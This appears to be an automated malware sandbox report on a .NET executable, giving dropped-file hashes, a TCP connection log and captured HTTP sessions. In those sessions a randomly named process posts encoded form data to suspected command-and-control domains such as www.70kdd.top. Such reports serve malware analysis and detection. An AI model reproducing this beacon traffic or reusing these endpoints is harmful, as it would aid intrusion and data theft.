                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.379460230152629
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z8vUyus:fLHyIFKL3IZ2KRH9Ouggs
                                                                                  MD5:5F355422EC7EF08609CC91728781B675
                                                                                  SHA1:EC2F98559C8DCCD7B3D9454618E092E6993632DF
                                                                                  SHA-256:5531100331171995A90752EE94B34BBE5DBDD7BCCD4B8530C1D9C77404E8CC9C
                                                                                  SHA-512:90CD74FEEA54C9A8FA1EDB2B46DDCBC8640F1573064A4F2A147E1BE04AFE84F6F77ADBB98CD108A55ED21E740726911D2196B716B48C2D6EAE93BFF936BA8CBE
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\SysWOW64\pcaui.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  File type:
                                                                                  Entropy (8bit):7.721271044960644
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  File name:W3MzrFzSF0.exe
                                                                                  File size:795'136 bytes
                                                                                  MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
                                                                                  SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
                                                                                  SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
                                                                                  SHA512:13c156d9ad7156b918207848a79e1419e96c53a65c0aab04f6aa572395c5a148805d9e90439e9b4095667361467560cd23e0f875950433003cbc7aba23f8700e
                                                                                  SSDEEP:12288:lnCb+eCSmxbeTHBVQAZQ+rX61yukWpGxFO9IbJoQ5GfHZPXjK/9I3j/VzrRZPCoT:luCUVn9X6HhuJoQ5QZPXu9Iz/VHRZKo
                                                                                  TLSH:A305F1403756C702E5864BB00861E3B427B92E9EF521C31B8BF9ADFF7835719A199387
                                                                                  Icon Hash:00928e8e8686b000
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                  Nov 27, 2024 01:26:11.912923098 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:12.032984972 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:12.033133984 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:12.047336102 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:12.167372942 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:13.309948921 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:13.310864925 CET8049845146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:13.310930014 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:13.550761938 CET4984580192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.569317102 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.689273119 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:14.691837072 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.705929041 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:14.825911999 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:14.826018095 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:16.123919964 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:16.124003887 CET8049851146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:16.124069929 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:16.207202911 CET4985180192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.230513096 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.350461006 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:17.350560904 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.359808922 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:17.479765892 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:18.682638884 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:18.682771921 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:18.683806896 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:18.685688972 CET4985780192.168.2.5146.88.233.115
                                                                                  Nov 27, 2024 01:26:18.805547953 CET8049857146.88.233.115192.168.2.5
                                                                                  Nov 27, 2024 01:26:24.469753981 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:24.589740992 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:24.597870111 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:24.609863043 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:24.729846001 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:26.113292933 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:26.274781942 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:27.131814957 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:27.251785040 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:27.253911018 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:27.267924070 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:27.391027927 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:28.769471884 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:28.934825897 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:29.788314104 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:29.908318996 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:29.908416986 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:29.924362898 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:30.044274092 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:30.044378996 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:31.441560984 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:31.606750965 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:32.473401070 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:32.593539000 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:32.593905926 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:32.605792046 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:32.725929976 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:46.558326006 CET8049875109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:46.561954975 CET4987580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:49.184237957 CET8049881109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:49.184596062 CET4988180192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:51.974158049 CET8049888109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:51.974221945 CET4988880192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:54.574369907 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:26:54.574486017 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:54.577888012 CET4989580192.168.2.5109.70.26.37
                                                                                  Nov 27, 2024 01:26:54.697978020 CET8049895109.70.26.37192.168.2.5
                                                                                  Nov 27, 2024 01:27:00.703170061 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:00.823086977 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:00.825979948 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:00.840353966 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:00.960334063 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.347738028 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:02.412770033 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.412846088 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.412874937 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:02.412914991 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:02.467715025 CET804995847.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:02.467788935 CET4995880192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:03.864310980 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:03.984359026 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:03.984422922 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:04.005177975 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:04.125125885 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.519608974 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:05.521507025 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.521594048 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.521684885 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:05.521899939 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:05.639554024 CET804996447.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:05.639622927 CET4996480192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.538031101 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.657855034 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:06.663065910 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.679953098 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:06.799869061 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:06.799995899 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:08.191807985 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:08.312108994 CET804997347.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:08.312176943 CET4997380192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.212352037 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.332324028 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:09.336107969 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.344810963 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:09.464884996 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:10.929296017 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:10.929505110 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:10.929630041 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:10.932378054 CET4998080192.168.2.547.76.213.197
                                                                                  Nov 27, 2024 01:27:11.052242041 CET804998047.76.213.197192.168.2.5
                                                                                  Nov 27, 2024 01:27:16.648510933 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:16.768404961 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:16.768583059 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:16.783996105 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:16.904088974 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:17.973313093 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:17.973402023 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:18.285254002 CET4999280192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:18.405081034 CET8049992208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:19.304115057 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:19.424067974 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:19.424201012 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:19.440047979 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:19.559919119 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:20.712877035 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:20.720097065 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:20.949398041 CET4999880192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:21.069293022 CET8049998208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:21.965245008 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:22.086236954 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:22.086323023 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:22.100759029 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:22.220829010 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:22.220849991 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:23.292267084 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:23.296468019 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:23.613470078 CET5000480192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:23.733352900 CET8050004208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:24.632114887 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:24.752053022 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:24.752229929 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:24.764094114 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:24.884030104 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225665092 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225786924 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225795031 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225806952 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225816011 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:26.225876093 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:26.225917101 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:26.231741905 CET5000580192.168.2.5208.91.197.27
                                                                                  Nov 27, 2024 01:27:26.351564884 CET8050005208.91.197.27192.168.2.5
                                                                                  Nov 27, 2024 01:27:32.608593941 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:32.728615046 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:32.728729010 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:32.919441938 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:33.039462090 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:34.335968018 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:34.336597919 CET80500068.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:34.336651087 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:34.425950050 CET5000680192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.548300982 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.668235064 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:35.668342113 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.835099936 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:35.955231905 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:37.283399105 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:37.283529997 CET80500078.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:37.283597946 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:37.348161936 CET5000780192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.378138065 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.498172998 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:38.498286009 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.603723049 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:38.723666906 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:38.723727942 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:40.074174881 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:40.074326038 CET80500088.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:40.074376106 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:40.113486052 CET5000880192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.132060051 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.252087116 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:41.254223108 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.280158043 CET5000980192.168.2.58.210.114.150
                                                                                  Nov 27, 2024 01:27:41.400201082 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:42.933449030 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:42.933465958 CET80500098.210.114.150192.168.2.5
                                                                                  Nov 27, 2024 01:27:42.933758020 CET5000980192.168.2.58.210.114.150
Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49735 | Destination IP: 103.21.221.87 | Destination Port: 80 | PID: 3812
Process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
Timestamp: Nov 27, 2024 01:25:21.069041014 CET | Bytes transferred: 366 | Direction: OUT | Data:
GET /7yx4/?005PE=aNcLxhD894SLKl&lH_L4=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1
                                                                                  Host: www.rtpterbaruwaktu3.xyz
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Timestamp: Nov 27, 2024 01:25:22.703896999 CET | Bytes transferred: 1033 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 27 Nov 2024 00:25:22 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49770 | Destination IP: 38.47.232.124 | Destination Port: 80 | PID: 3812
Process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
Timestamp: Nov 27, 2024 01:25:38.756294966 CET | Bytes transferred: 597 | Direction: OUT | Data:
POST /klhq/ HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.70kdd.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.70kdd.top/klhq/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
Timestamp: Nov 27, 2024 01:25:40.236278057 CET | Bytes transferred: 312 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49774 | Destination IP: 38.47.232.124 | Destination Port: 80 | PID: 3812
Process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
Timestamp: Nov 27, 2024 01:25:41.435967922 CET | Bytes transferred: 617 | Direction: OUT | Data:
POST /klhq/ HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.70kdd.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.70kdd.top/klhq/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wl+OSjUpEfYNU3The3wid03rhJ0ClL9MgltiIqF
Timestamp: Nov 27, 2024 01:25:43.001934052 CET | Bytes transferred: 312 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49780 | Destination IP: 38.47.232.124 | Destination Port: 80 | PID: 3812
Process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
Timestamp: Nov 27, 2024 01:25:44.092979908 CET | Bytes transferred: 1634 | Direction: OUT | Data:
POST /klhq/ HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.70kdd.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.70kdd.top/klhq/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: lH_L4= [TRUNCATED]
Timestamp: Nov 27, 2024 01:25:45.679646015 CET | Bytes transferred: 312 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49785 | Destination IP: 38.47.232.124 | Destination Port: 80 | PID: 3812
Process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
Timestamp: Nov 27, 2024 01:25:46.749102116 CET | Bytes transferred: 355 | Direction: OUT | Data:
GET /klhq/?lH_L4=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.70kdd.top
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Timestamp: Nov 27, 2024 01:25:48.315025091 CET | Bytes transferred: 312 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:25:48 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66e01838-94"
